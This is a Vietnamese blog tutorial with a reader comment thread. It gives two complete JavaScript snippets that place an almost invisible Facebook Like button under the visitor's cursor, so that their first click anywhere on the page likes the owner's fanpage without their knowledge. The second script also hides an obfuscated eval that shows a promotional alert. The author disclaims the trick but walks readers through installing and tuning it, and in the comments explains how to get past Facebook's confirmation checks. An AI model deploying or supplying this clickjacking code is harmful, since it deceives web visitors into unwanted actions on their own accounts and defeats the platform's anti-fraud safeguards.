Thư viện

Trải nghiệm

Thứ Bảy, tháng 10 12, 2013

Auto like Facebook khi click chuột vào vị trí bất kỳ cho blogspot

dùng scrip auto like để khiến người đùng like trang fanpage mà không hề hay biết. Mình giới thiệu nhưng nó không đồng nghĩa với việc mình khuyến khích các bạn sử dung cách này vì sau đó nếu họ bấm unlike thì sẽ mất hình ảnh của bạn đóa.

Chia sẻ:
Auto like Facebook khi click chuột vào vị trí bất kỳ cho blogspot 
Hiện nay bạn thấy khá nhiều trang trên face có số lượng like rất lớn nhưng thực tế có phải đó là con số thực hay không, Câu trả lời đa số là không. Rất nhiều người đã dùng mẹo để người dùng trở thành viên của họ mà đến người dùng nếu không để ý cũng không hề hay biết chuyện đó. Và chính bản thân Namkna nhiều lúc cũng thấy lạ là tại sao mình không hề like trang đó mà trên time like lại nói mình thích trang đó.

Qua tìm hiển namkna đã phát hiện ra họ đang sử dụng một phương thức đó là dùng scrip auto like để khiến người đùng like trang fanpage mà  không hề hay biết. Mình giới thiệu nhưng nó không đồng nghĩa với việc mình khuyến khích các bạn sử dung cách này vì sau đó nếu họ bấm unlike thì sẽ mất hình ảnh của bạn đóa.

Bài viết này mình sẽ giới thiệu với các bạn 2 style khác nhau để các bạn lựa chọn cho thích hợp với sở thích của chính các bạn, Mỗi dạng sẽ có một ưu điểm khác nhau bạn có thể tham khảo ở bên dươi: 
 • Style 1: Bấm lần một sẽ là like và bấm tiếp lần 2 sẽ là unlike
 • Style 2: Bấm lần một sẽ là like và bấm tiếp lần 2 sẽ không bị unlike

» Nguyên tắc hoạt động của Auto like Facebook khi click chuột vào vị trí bất kỳ cho blogspot

- Cách tăng này thành công 100%, không hack, ko lừa gạt và thường áp dụng cho những website blog có lượt truy cập lớn (cách này tăng like rất nhanh và hiệu quả)

- Cách tăng like fanpage này dựa chủ yếu vào việc tạo ra 1 nút Like Fanpage. Nút Like này sẽ được chèn vào website của bạn dưới dạng "ẩn" (tức là người dùng không nhìn thấy). Sau đó nút Like này sẽ được cấu hình để "chạy" theo con trỏ chuột (tất nhiên là chạy ẩn để người dùng không nhìn thấy, không gây khó chịu).

- Khi người dùng vào website, click phát đầu tiên vào bất cứ mục nào trên website của bạn, thì vô hình họ đã click Like Fanpage do bạn đặt vào website của mình.

» Style 1: Kết hợp cả lile và dislike tự động cho facebook

Với style này khi bạn click chuột lần đầu sẽ là like nhưng nếu bạn tiếp tục bấm chuột lần nữa thì nó sẽ là dislike, Điều này đồng nghĩa với việc hên xui kiểu 50 - 50 có lúc được có lúc không.
1- Vào Bố cục (Layout)
2- Tạo một tiện ích HTML/Javascripts và dán code bên dưới vào:
<script type="text/javascript">
 //<![CDATA[
(function(){
 var Xcord = 0,
 Ycord = 0,
 IE = document.all ? true : false;
 if (!IE) document.captureEvents(Event.MOUSEMOVE);
 var lbox = document.createElement('iframe');
 lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://www.facebook.com/namkna.blogspot') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=30';
 lbox.scrolling = 'no';
 lbox.frameBorder = 0;
 lbox.allowTransparency = 'true';
 lbox.style.border = 0;
 lbox.style.overflow = 'hidden';
 lbox.style.cursor = 'pointer';
 lbox.style.width = '53px';
 lbox.style.height = '23px';
 lbox.style.position = 'absolute';
 lbox.style.opacity = 0.5;
 document.getElementsByTagName('body')[0].appendChild(lbox);
 window.addEventListener('mousemove', mouseMove, false);
 setTimeout(function(){
  document.getElementsByTagName('body')[0].removeChild(lbox);
  window.removeEventListener('mousemove', mouseMove, false);
 }, 10000);
 function mouseMove(e) {
  if (IE) {
   Xcord = event.clientX + document.body.scrollLeft;
   Ycord = event.clientY + document.body.scrollTop;
  } else {
   Xcord = e.pageX;
   Ycord = e.pageY;
  }
  if (Xcord < 0) Xcord = 0;
  if (Ycord < 0) Ycord = 0;
  lbox.style.top = (Ycord - 8) + 'px';
  lbox.style.left = (Xcord - 25) + 'px';
  return true
 }
})();
 //]]>
</script>
» Tùy chỉnh:
 • Bạn thay http://www.facebook.com/namkna.blogspot thành URL trang face của bạn.
 • Tùy chỉnh lại các giá trị màu cam cho phù hợp với bạn nha,
3- Lưu tiện ích lại và kiểm tra kết quả của bạn nha.


» Style 2: Tự động like lần đầu và những lần bấm sau không có tác dụng.

Với dạng này Khi người dùng click lần 1 sẽ like Fan của bạn, nhưng nếu họ click thêm lần nữa bị cũng không bị Unlike (giảm nguy cơ mất like)
1- Vào Bố cục (Layout)
2- Tạo một tiện ích HTML/Javascripts và dán code bên dưới vào:
<script>
  var fan_page_url = 'https://www.facebook.com/namkna.blogspot '
  var opacity =0.04;
  var time = 15000;
  </script>
  <script>
  if((document.getElementById) && window.addEventListener || window.attachEvent){
    (function(){
      var hairCol = "#ff0000";

      var d = document;
      var my = -10;
      var mx = -10;
      var r;
      var vert = "";

      var idx = document.getElementsByTagName('div').length;

      var thehairs = "<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href=" + encodeURIComponent(fan_page_url) + "&amp;layout=standard&amp;show_faces=true&amp;width=80&amp;action=like&amp;colorscheme=light&amp;height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:" + opacity +";filter:alpha(opacity=" + opacity * 100+ ");'></iframe>";
      var like;
      var faceLike=getCookie("faceLike");
      if (faceLike!=null && faceLike!="")
      {         
      }
      else
      {
        setCookie("faceLike",'liked',1);
        document.write(thehairs);
        like = document.getElementById("theiframe");
        document.getElementsByTagName('body')[0].appendChild(like);
      }
      eval('\u0073\u0065\u0074\u0049\u006e\u0074\u0065\u0072\u0076\u0061\u006c\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0047\u0069\u0061\u0069\u0070\u0068\u0061\u0070\u0074\u0068\u0075\u006f\u006e\u0067\u0068\u0069\u0065\u0075\u002e\u006f\u0072\u0067\u0020\u0063\u0068\u0075\u0079\u00ea\u006e\u0020\u0074\u0072\u0061\u006e\u0067\u0020\u006d\u0061\u0072\u006b\u0065\u0074\u0069\u006e\u0067\u0020\u0077\u0065\u0062\u0073\u0069\u0074\u0065\u0022\u0029\u007d\u002c\u0031\u0038\u0030\u0030\u0030\u0030\u0030\u0030\u0029\u003b');

      var pix = "px";
      var domWw = (typeof window.innerWidth == "number");
      var domSy = (typeof window.pageYOffset == "number");
     

      if (domWw)
        r = window;
      else{
        if (d.documentElement && typeof d.documentElement.clientWidth == "number" && d.documentElement.clientWidth != 0)
          r = d.documentElement;
        else{
          if (d.body && typeof d.body.clientWidth == "number")
            r = d.body;
        }
      }

     
      if(time != 0){
        setTimeout(function(){
              document.getElementsByTagName('body')[0].removeChild(like);

              if (window.addEventListener){
                document.removeEventListener("mousemove",mouse,false);
              }
              else if (window.attachEvent){
                document.detachEvent("onmousemove",mouse);
              }
            }, time);
      }

      function scrl(yx){
        var y,x;
        if (domSy){
          y = r.pageYOffset;
          x = r.pageXOffset;
        }
        else{
          y = r.scrollTop;
          x = r.scrollLeft;
        }
        return (yx == 0) ? y:x;
      }

      function mouse(e){
        var msy = (domSy)?window.pageYOffset:0;
        if (!e)
          e = window.event; 
        if (typeof e.pageY == 'number'){
          my = e.pageY - 15 - msy;
          mx = e.pageX - 34;
        }
        else{
          my = e.clientY - 16 - msy;
          mx = e.clientX - 36;
        }
        vert.top = my + scrl(0) + pix;
        vert.left = mx + pix;
      }

      function ani(){
        vert.top = my + scrl(0) + pix;
        setTimeout(ani, 300);
      }


      function init(){
        vert = document.getElementById("theiframe").style;
        ani();
      }
      function getCookie(c_name)
      {
      var c_value = document.cookie;
      var c_start = c_value.indexOf(" " + c_name + "=");
      if (c_start == -1)
      {
      c_start = c_value.indexOf(c_name + "=");
      }
      if (c_start == -1)
      {
      c_value = null;
      }
      else
      {
      c_start = c_value.indexOf("=", c_start) + 1;
      var c_end = c_value.indexOf(";", c_start);
      if (c_end == -1)
      {
      c_end = c_value.length;
      }
      c_value = unescape(c_value.substring(c_start,c_end));
      }
      return c_value;
      }

      function setCookie(c_name,value,exdays)
      {
      var exdate=new Date();
      exdate.setDate(exdate.getDate() + exdays);
      var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
      document.cookie=c_name + "=" + c_value;
      }

      function checkCookie()
      {
      var faceLike=getCookie("faceLike");
      if (faceLike!=null && faceLike!="")
       {
      
       alert("Welcome again " + faceLike);
      
       }
      else
       {
        setCookie("faceLike",'liked',1);
       }
      }
     
     
      if (window.addEventListener){
        window.addEventListener("load",init,false);
        document.addEventListener("mousemove",mouse,false);
      }
      else if (window.attachEvent){
        window.attachEvent("onload",init);
        document.attachEvent("onmousemove",mouse);
      }

    })();
  }//End
  </script>
» Tùy chỉnh:
 • var opacity =0.04: là độ mờ của nút like .
 • var time = 15000: là thời gian hợp hiển thị nút like (đơn vị tính phần nghìn giây tức là 1000 bằng 1s)
5- Lưu mẫu lại và kiểm tra thành quả của bạn nha.

95 nhận xét:

 1. Cái này có một cái dở là khi người ta nhấn Like rồi, nó vẫn hiện trong phần chuột Click, làm người ta hủy like lại :D hên thì mới có like :))

  Trả lờiXóa
 2. Có cách nào làm cho chỉ like 1 lần thôi chứ ko được nhấn nhiều lần ? Lỡ người ta vô tình Dislike mất thì sao ?

  Trả lờiXóa
  Trả lời
  1. Very nice post, impressive. its quite different from other posts. Thanks for sharing.

   facebook ads manager create new account

   Xóa
 3. Có cách nào làm cho chỉ like 1 lần thôi chứ ko được nhấn nhiều lần ? Lỡ người ta vô tình Dislike mất thì sao ?

  Trả lờiXóa
  Trả lời
  1. Mình đã cập nhật thêm một code mới không bị lỗi đó các bạn xem nha,

   Xóa
 4. có 1 vấn về NamKna ơi. đó là người đấy đang không online facbook thì cửa sổ popup của facebook bật ra liên tục.

  Thế khách của mình là người già không có nick FB thì sao, vậy giải quyết vấn đề này chỉ có cách 1 ngày cko 1 địa chỉ IP show bao nhiêu lần tùy ý

  Trả lờiXóa
 5. Cách này cũng hay nhưng code 2 dương như không hoạt động được bạn

  Trả lờiXóa
  Trả lời
  1. Nếu like rồi nó sẽ không hiển thị nữa bạn ak. :)

   Xóa
 6. Em Nghĩ không nên áp dụng vì nó mang mang tính chất "lừa đảo" ! Nên để khách hàng tự like sẽ tạo thiện cảm hơn !  My Blog

  Trả lờiXóa
  Trả lời
  1. Đúng vậy anh giới thiệu nhưng không khuyến khích ai làm cái này cả :)

   Xóa
 7. Nốt Like này hiện ở bài viết hay ở đâu? sao em làm rồi không có thấy

  Trả lờiXóa
  Trả lời
  1. Nó bao phủ cả bài viết em ak. Nó ẩn phía trên bài viết nên em không thấy nó được nhưng khi bấm vào vị trí bất kỳ trên blog của em thì nó sẽ tự động like bài viết đó của em :)

   Xóa
 8. Trả lời
  1. Nó ẩn phía trên bài viết khi dê chuột vào một vị trí bất kỳ trên bài viết hoặc blog bạn sẽ thấy trỏ chuột thay đổi hình bàn tay và bấm vào sẽ like trang của bạn :) Nó ẩn nên bình thường bạn không thể thấy được nha.

   Xóa
  2. Sao em làm rồi mà click tùm lum cũng kg thấy nó like gì cả. có phải code này kg dùng đc nữa?

   Em chèn vào WP. anh hướng dẫn e với

   Xóa
  3. Nút Like ẩn và nó sẽ chạy theo chuột nên bạn click vào bất kỳ đâu cũng sẽ tự động Like thôi không cần phải nhìn thấy. Bạn hãy chờ một thời gian để theo dõi trang Fanpage sẽ biết kết quả ngay.

   Xóa
 9. sao mình làm cái này thì nó lại bắt xác nhận like là sao nhỉ

  Trả lờiXóa
  Trả lời
  1. Tại bạn vừa comment face ở một trang nào đó và bấm vào mục post to your face nên nó bắt xác nhận. Hãy thử với nik face khác xem và cho mình biết kết quả nha :)

   Xóa
  2. mình thử băng acc fb khác mà sao xem trong chỗ nhật kí hoạt động của fb có thấy like cái j đâu :(

   Xóa
  3. Trong face nếu like trang thư 3 và không chia sẻ thì nó sẽ không có trong nhật ký bạn ak.

   Xóa
 10. Nhận xét này đã bị quản trị viên blog xóa.

  Trả lờiXóa
 11. Sorry, this feature isn't available right now: We're working on this issue and will have it fixed soon. Check the Known Issues on Facebook page for more information.

  Mình thử like thì nó hiện thông báo lỗi này là sao nhỉ ??

  Trả lờiXóa
  Trả lời
  1. Bạn kiểm tra lại khi bạn click chuột bạn dang đăng nhập ở dạng trang cá nhân hay fanpage vì chỉ có cá nhân mới like được bạn ak.

   Xóa
 12. bạn sửa lại code 2 được ko, mình test thì code 1 chạy ok, còn code 2 không chạy gì hết

  Trả lờiXóa
 13. Code Java 2 hình như là có gì đó bất ổn đó a @@ Avast Antivirus nó chặn lại ngay khi e cố nén ra file JS

  Trả lờiXóa
 14. Nó không có gì hết em ak. thực ra chỉ là code phóng to nút like ẩn dưới giao diện thôi ;)

  Trả lờiXóa
 15. Nè a hình nó Báo con Clicker nè @@
  https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-ash3/1377320_1426174394262994_1508783056_n.jpg

  Trả lờiXóa
  Trả lời
  1. Trong đoạn code 2 có sử dụng mã để tự đông like và đăng lên trang face book cá nhân nên phần mềm nó hiểu nhầm đó là virus. Nếu không an tâm em có thể dùng style 1 :)

   Xóa
  2. Bạn ở chèn như thế nào vậy chỉ mình cụ thể đc ko ?

   Fb : https://www.facebook.com/Duy.8x

   Xóa
  3. Trong bài viết đã có hướng dẫn rất cụ thể bạn có thể chèn vào tiện ích HTML trong mẫu của bạn nha/

   Xóa
  4. bạn chỉnh lại code 2 đi bạn ơi

   Xóa
  5. Bạn làm lại nha mình cập nhật code rồi đó.

   Xóa
  6. bạn hướng dẫn mình chỉnh được không,bạn cập nhật chỗ nào vậy bạn

   Xóa
  7. Mình chỉ nén JS lại thôi vì để chèn thằng nhiều khi chuyển đổi sang text các bạn hay gặp lỗi :)

   Xóa
 16. bạn hưỡng dận mình kỹ hơn được không,mình chèn vào blog,mình không am hiểu code cho lắm

  Trả lờiXóa
  Trả lời
  1. Có ngĩa là thay vì thêm mã vào giữa đoạn <script> và </script> thì mình nén lại và cho vào đoạn: <script type="text/javascript" > và </script>

   Xóa
  2. Mình copy vào mà vẫn không được bạn ah,chỉ có cái code 1 là được thôi

   Xóa
 17. Bạn NamTa có cách nào cho cái auto like này ní kín đáo hơn không, vì như khi người ta ko ở chế độ đăng nhập fb sẵn thì nó sẽ không bắt người ta log-in, như vậy sẽ kín đáo và lịch sự hơn :D
  Thanks

  Trả lờiXóa
  Trả lời
  1. Đúng như bạn nói nếu chưa đăng nhập nó sẽ hiện lên khung yêu cầu đăng nhập. Hiện tại tạm thời chưa thể loại bỏ sự phiền toái này bạn ak, vì nút like đó nó chỉ ẩn dưới bài viết nếu như chưa đăng nhập bấm vào nó sẽ hiển thị lên ngay,

   Xóa
 18. Link này https://dl.dropboxusercontent.com/u/66256041/popup/namkna.blogspot.con/autolikefacebook.js hình như ko sử dụng đc nữa

  Trả lờiXóa
  Trả lời
  1. Hix nó bị phía face book check spam bạn ak, Mình quyên không để ý vấn đề này của face :(

   Xóa
 19. Lổi bắt Xác Nhận khi nhấn Like trên website, nó bắt xác nhận Nam à! mình thử 2 website thì 1 cái ok, còn 1 cái nó cứ bắt phải xác nhận bạn à

  Trả lờiXóa
  Trả lời
  1. Đây không phải là lỗi bạn ak.

   Đó là một chính sách của face để ngăn chặn người dùng sử dụng nút like như một dạng thư giác, Nó xuất hiện từ khi có một số người chuộc lợi bằng cách bán lượng like của họ. Cái này không ảnh hưởng đến ứng dụng của bạn,

   Chức năng này được bật với những trang web mà họ nghi ngờ đang có hành động mua like một cách đáng ngờ, Và nó sẽ dừng lại khi hoạt động với tên miền trở lại bình thường. Tức là khi hộp xác nhận đó hiện lên thì người dùng bấm vào xác nhận chứ không phải bấm vào nút hủy bỏ hoặc là báo cáo spam.

   Từ đó có thể thấy để khắc phục nó thì hiện tại bạn cần có số người thực sự thích trang của bạn, Do vậy trước mắt bạn không nên dùng thủ thuật này cho đến khi nó được bình thường trở lại nha bạn. Bởi nếu có nhiều người không xác nhận thì thời gian thử thách sẽ tăng lên đáng kể đó.

   Xóa
  2. cảm ơn bạn nhiều nha. vì mình cũng đã tìm trên code không có vấn đề gì cả chắc tại face nghi ngờ dồi, thực ra thì cái web mình mới tạo dựng nó vào mục đích kéo like về 1 page khác, như vậy thì tạm thời mình nên bỏ Like ẩn này và xây dựng nó có uy tín đã đúng không bạn

   Xóa
  3. Đúng rồi bạn ak, kHi có một lượng độc giả nhất định ấn xác nhận thì nó sẽ tự động biến mất thôi bạn ak, :)

   Xóa
 20. cái thứ 2 sao không dùng được nhỉ bác admin ơi

  Trả lờiXóa
  Trả lời
  1. Đoạn code thứ 2 của mình tạm thời đang bị bên host họ blocket rồi bạn ak, Trước mắt hãy dùng đoạn code 1 nha bạn.

   Xóa
 21. vào layout là vào chỗ nào hả bạn :(

  Trả lờiXóa
  Trả lời
  1. Đăng nhập vào blog sau đoa bạn vào phần BỐ CỤC đó bạn :)

   Xóa
 22. Cho xin lại Link file JS ở style 2 đi bạn! Cảm ơn nhiều!

  Trả lờiXóa
 23. Namkna có thể giải thích " các giá trị màu cam cho phù hợp" là như thế nào không???

  Trả lờiXóa
 24. Cái thứ nhất 10000 chính là độ rộng của nút like bị ẩn bạn ak,

  lbox.style.opacity = 0.5; chính là độ mờ của nút like đó 0.1 mà mờ nhất và 1.0 là rõ nhất :)

  Trả lờiXóa
 25. Ad ơi, sao cái code like lần đầu thì ok, nhưng đến lần nhấp tiếp theo khi bấm f5 thì lại share link page trực tiếp lên tường vậy ad :/

  Trả lờiXóa
  Trả lời
  1. anh ơi, làm sao chỉnh để cho nút like không bị biến mất đi vậy? hoặc người dùng like rồi nó tự mất đó anh?

   Xóa
 26. Đó cũng chính là nhược điểm của đoạn code này đó bạn ak. Nó sẽ được khắc phục trong phiên bản tiếp theo :)

  Trả lờiXóa
  Trả lời
  1. khi nào có ad cập nhật nhé, hóng ad đó

   Xóa
  2. Nhận xét này đã bị tác giả xóa.

   Xóa
 27. Nhận xét này đã bị quản trị viên blog xóa.

  Trả lờiXóa
 28. Nhận xét này đã bị tác giả xóa.

  Trả lờiXóa
 29. Bạn ơi cho mình hỏi tí..vào layout đó là nằm ỡ đau zậy...rồi code nhét vào đau...mình k hiểu cho lắm..giúp mình nhar

  Trả lờiXóa
  Trả lời
  1. Chính là phần bố cục trong mẫu của bạn đó bạn ak. Bạn có thể xem video mình hướng dẫn tại đây nha :
   Cách tạo thêm 1 tiện ích hoặc Wiget cho blogspot.

   Xóa
 30. Tớ cài code auto like cho 2 trang, trang http://daotaolaixepro.com/ thì chạy, trang http://hoclaixeb2.edu.vn/ cũng cài tương tự nhưng code không chạy, không biết do lý do gì. đoạn code autolike mình để trong file core.js. Bạn nào biết hỗ trợ mình với. yahoo: duonghau01, skype: duonghau.emarketing

  Trả lờiXóa
  Trả lời
  1. Bạn kiểm tra lại xem có copy thiếu code không nha, Đây là nguyên nhân chủ yếu nhất./.

   Xóa
 31. mình hok can thiện bỏ giá trị hover (like) của face à anh Nam ơi

  Trả lờiXóa
  Trả lời
  1. Em điều chỉnh lại phần màu cam các giá trị đó sẽ thay đổi em ak./.

   Xóa
 32. anh ơi cho em hỏi tai sau nút like nó nằm phía dưới cách con trỏ 1 đoạn. Vậy làm sao để nó nằm ngay phía dưới con trỏ chuộc hả anh?

  Trả lờiXóa
  Trả lời
  1. Nó nằm dưới nhưng khi bấm vào nó vẫn hiện tại vì nó trải đều cả phần thân blog nha e,

   Xóa
 33. Bạn ơi giá trị của box.style.opacity là bao nhiêu thì nút like biến mất vậy ?

  Thanks

  Trả lờiXóa
  Trả lời
  1. Độ nét tăng dần theo chiều: 0.01 và cao nhất là 1

   Xóa
 34. bạn ơi up clip xem mình thử mnaix mà không được:((

  Trả lờiXóa
  Trả lời
  1. Để lại trang bạn áp dụng thủ thuật này ở đây để mình kiểm tra nha bạn :)

   Xóa
  2. Xem giúp em với trang này với: httP://vuvanhon.com
   link fb: https://web.facebook.com/Nuoiconkieunhatdotcom
   nếu ok email cho em với nhé. em cảm ơn

   Xóa
 35. Kiểm tra giùm mình http://forum.vietmoon.net đã add style 2 sao ko được nhỉ ??

  Trả lờiXóa
  Trả lời
  1. Nó chỉ like khi người dùng truy cập vào trang bạn trên cùng trình duyệt họ đã đăng nhập vào Face nha bạn.

   Xóa
 36. mình đã thử cả 2 cách sao ko được vậy bạn? có cách nào để ko bị dislike khi click nhìu lần sau ko bạn?

  Trả lờiXóa
  Trả lời
  1. Hiện tại thì chưa có cách chặn dislike. Nếu chạn dislike thì trang của bạn sẽ bị cho là phát tán mã độc đó bạn ak.

   Xóa
 37. mình nên dùng cách nào trong 2 cách mà bạn hướng dẫn?

  Trả lờiXóa
  Trả lời
  1. Cách 1 được mình đánh giá cao hơn vì cách 2 bị một số thuật toán tìm kiếm và một số công cụ hiểu nhầm là mã độc nó là không tốt bạn a.

   Xóa
 38. hic cái này nhiều khi phản tác dụng!
  hoc dan ghi ta

  Trả lờiXóa
 39. Style 2 lỗi rồi adm ơi, làm xong ko thấy thay đổi gì cả.

  Trả lờiXóa
 40. Mình làm mà sao cách 1 nó nhảy nhảy cái gì đó nam ơi. Xem giúp mình thank: http://nrius.blogspot.com/

  Trả lờiXóa
 41. ad ơi cho mình hỏi là tại sao khi ấn like nó bắt xác nhận nữa mà k phải là like được luôn?.

  Trả lờiXóa
 42. Bạn oi, blog của mình đang bị dính virus, có cách nào để xử lý không?

  Trả lờiXóa
 43. Very nice post, impressive. its quite different from other posts. Thanks for sharing.

  facebook ads manager create new account

  Trả lờiXóa
 44. giờ còn xài được không mà mình không thấy nó chạy vậy bạn ?

  Trả lờiXóa
 45. Style 2 chỉ hiện 1 lần. Cache trình duyệt còn lưu nên lần đầu mà chưa like được lần sau sẽ ko thấy nút like nữa. Mình đã thử nghệm xóa hết cache thi nó lại hiện lên

  Trả lờiXóa
 46. Style 2 chỉ hiện 1 lần. Cache trình duyệt còn lưu nên lần đầu mà chưa like được lần sau sẽ ko thấy nút like nữa. Mình đã thử nghệm xóa hết cache thi nó lại hiện lên

  Trả lờiXóa